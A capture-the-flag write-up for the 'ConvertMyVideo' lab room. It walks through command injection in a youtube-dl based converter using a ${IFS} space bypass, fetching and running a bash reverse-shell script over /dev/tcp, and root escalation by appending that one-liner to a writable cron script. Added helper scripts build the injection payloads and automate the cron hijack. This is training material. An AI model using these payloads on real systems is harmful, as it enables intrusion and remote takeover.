ConvertMyVideo THM
IP
10.10.53.160
Initial Nmap scan
sudo nmap -sV -sC -A -oA initial_nmap 10.10.53.160

Full Nmap scan (all TCP ports)
nmap -T5 -p- -oA full_nmap 10.10.53.160
Ports
22: SSH
80: HTTP (Apache 2.4.29)
Port 80 HTTP
When we navigate to http://10.10.53.160 we are greeted with the following page:

Let's perform some directory busting and see if we can find any hidden directories:
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.53.160:80 -o dirs.txt
Within feroxbuster's results we find an
/admin
directory. When we navigate to it we are prompted for a username and password; default credentials didn't work.
Let's focus on the convert-my-video function on the home page.
We can try some command injection and intercept the request in Burp to see what is happening.

Within our proxy, let's send the request to Repeater.
When we send the request from Repeater we can see we get an error back:

Let's google the error and see if it gives us more context.
From our search we can see the application uses youtube-dl, a command-line program to download videos from YouTube.
Looking through the repo we can see that what we submit is passed straight through to youtube-dl on the command line, which is exactly the setup that allows command injection.

We can perform command injection!

We are getting results back, so let's upload a bash reverse-shell script and use it to get an interactive shell.
The script is a one-liner:
bash -i >& /dev/tcp/10.14.45.1/9001 0>&1
We'll save this as rev.sh and serve it to the target from our machine. Start a Python web server in the directory containing rev.sh:
python3 -m http.server 8081
Now we use Burp Repeater to alter the request and have the target fetch the script with wget.
When adjusting the request I noticed that replacing spaces with %20 didn't work, but ${IFS} worked perfectly as a substitute for whitespace: the shell expands ${IFS} to its default field separators (space, tab, newline) and then word-splits the result, so the injected command gets its arguments separated without a literal space ever appearing in the request.

We can see from the Python server's log that the target machine downloaded our script.

Now we need to set up our netcat listener:
nc -lvnp 9001
From Burp again, we alter the request to run our downloaded script on the target machine (same ${IFS} trick for the space).

Now we have a shell on the target.
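The ${IFS} trick and the payload building above, as an added example that is not part of the room or this writeup. The vulnerable_handler function is a stand-in modelled on the writeup's description (the submitted value lands in a shell command line unquoted and is executed); the real parameter name and request format are not shown on this page and are not assumed. It runs locally with sh and never touches the target.

```shell
#!/bin/sh
# Added example, not code from the room or the original writeup: why
# ${IFS} works as a whitespace substitute in the injected command, plus a
# small helper that builds such payloads.

# Stand-in for the vulnerable converter (assumption): it builds a command
# line from the untrusted value and hands it to a shell. Stderr is merged
# into stdout so the demo can show the error from the failed attempt.
vulnerable_handler() {
    sh -c "echo converting $1" 2>&1
}

# Replace every space in a command with the literal text ${IFS}. When the
# target shell parses the injected command it expands ${IFS} to the default
# field separators (space, tab, newline) and then word-splits the result,
# so "wget${IFS}URL" becomes the two words wget and URL. A literal %20, by
# contrast, is just three ordinary characters glued onto the command name.
ifs_encode() {
    printf '%s' "$1" | sed 's/ /${IFS}/g'
}

# Terminate whatever command the application was running with ';' and
# append ours, space-free.
build_payload() {
    printf ';%s' "$(ifs_encode "$1")"
}

# The two payloads the writeup sends through Burp (attacker IP and port as
# used above; adjust to your own).
build_payload 'wget http://10.14.45.1:8081/rev.sh'; echo
build_payload 'bash rev.sh'; echo

# Demo against the stand-in: the %20 attempt fails with "not found", while
# the ${IFS} attempt runs the injected echo after the original command.
vulnerable_handler 'x;echo%20injected' || true
vulnerable_handler "x$(build_payload 'echo injected ok')"
```

The sed replacement is enough here because the commands only contain spaces; if a payload needed tabs or newlines it would have to be encoded the same way, since the point is that no literal whitespace character is sent.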

Privilege escalation from www-data
First, we want to stabilize our shell; we can use Python for this:
python3 -c "import pty;pty.spawn('/bin/bash')"
From our directory busting we know there is an admin directory; there isn't much in it other than the user flag.
Let's start enumerating the system.
OS
cat /etc/os-release

Kernel information
cat /proc/version

Using searchsploit we found a couple of kernel exploits we could try, but they need gcc on the target, which is not installed.
SUID files
find / -type f -perm -04000 -ls 2>/dev/null
Nothing interesting.
Cron jobs
ls -al /etc/cron* /etc/at*
crontab -l
Nothing interesting in the files we can read.
Processes running as root
ps aux | grep root

We can see cron is running, but we don't have much information about what it executes.
Let's download pspy to see what commands users (including root's cron) are running on the target.
Copy pspy into your working directory:
cp /opt/pspy64 .
Start a Python web server in your working directory:
python3 -m http.server 8081
On the target machine use wget to download the file; don't forget to cd into /tmp first, since www-data can write there:
cd /tmp && wget http://10.14.45.1:8081/pspy64
Give pspy64 execute permission:
chmod +x pspy64
Now let's run it:
./pspy64
Among the periodic processes we find
/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh
being run by root. If www-data can write to clean.sh (confirm that first), we can add our own commands to it and they will run as root on the next cron run.

Let's get another reverse shell by appending our bash one-liner to the script so that it executes as root. Append rather than overwrite, so the script keeps doing its cleanup and nothing looks broken, and use a different port (9002) so it doesn't clash with our existing shell:
echo "bash -i >& /dev/tcp/10.14.45.1/9002 0>&1" >> /var/www/html/tmp/clean.sh
Start our netcat listener before cron fires:
nc -lvnp 9002
Now we wait for cron to execute the file.
Now we are root.
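The cron hijack above, as an added example that is not part of the room or this writeup: a small shell helper that takes the command line as pspy printed it, reports which script paths in it the current user can actually write to, and appends a payload without corrupting the script. The paths and the pspy-style command line in the demo are assumptions modelled on the writeup, and the demo runs against a temporary copy, not the real /var/www/html/tmp/clean.sh.

```shell
#!/bin/sh
# Added example, not code from the room or the original writeup: turn the
# pspy finding into a checked, repeatable step. Before appending anything
# to a script that root's cron runs, confirm it is writable by the current
# user; then append the payload without breaking the script.

# Given a cron command line as pspy prints it, list the absolute script
# paths in it that the current user can write to. Splits on whitespace,
# which is enough for the "cd DIR && bash DIR/clean.sh" shape seen above.
writable_scripts() {
    for word in $1; do
        case "$word" in
            /*) if [ -f "$word" ] && [ -w "$word" ]; then
                    printf '%s\n' "$word"
                fi ;;
        esac
    done
    return 0
}

# Append a command line to a script. If the script does not end with a
# newline, the appended line would be glued onto its last line, so add one
# first. Returns 1 and leaves the file untouched if it is not writable.
append_payload() {
    script=$1
    payload=$2
    [ -w "$script" ] || return 1
    # $(tail -c 1 ...) is empty exactly when the last byte is a newline,
    # because command substitution strips trailing newlines.
    if [ -s "$script" ] && [ -n "$(tail -c 1 "$script")" ]; then
        printf '\n' >> "$script"
    fi
    printf '%s\n' "$payload" >> "$script"
}

# Demo against a temporary copy so nothing on the real system is touched:
# build a writable stand-in for clean.sh (assumed content, no trailing
# newline on purpose), run the check on a pspy-style command line, then
# append a harmless line in place of the reverse-shell one-liner.
demo() {
    dir=$(mktemp -d)
    printf 'rm -f ./*.tmp' > "$dir/clean.sh"
    chmod 644 "$dir/clean.sh"
    cmdline="/bin/sh -c cd $dir && bash $dir/clean.sh"
    echo "writable scripts in: $cmdline"
    writable_scripts "$cmdline"
    append_payload "$dir/clean.sh" 'echo "payload would run here"'
    echo "resulting script:"
    cat "$dir/clean.sh"
    rm -rf "$dir"
}

demo
```

On the box the payload is the bash one-liner from above; the helper only guards the two things that commonly go wrong when hijacking a cron script: appending to a file you cannot actually write (the shell redirection fails silently inside a non-interactive shell) and gluing the payload onto a last line that lacks a newline.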
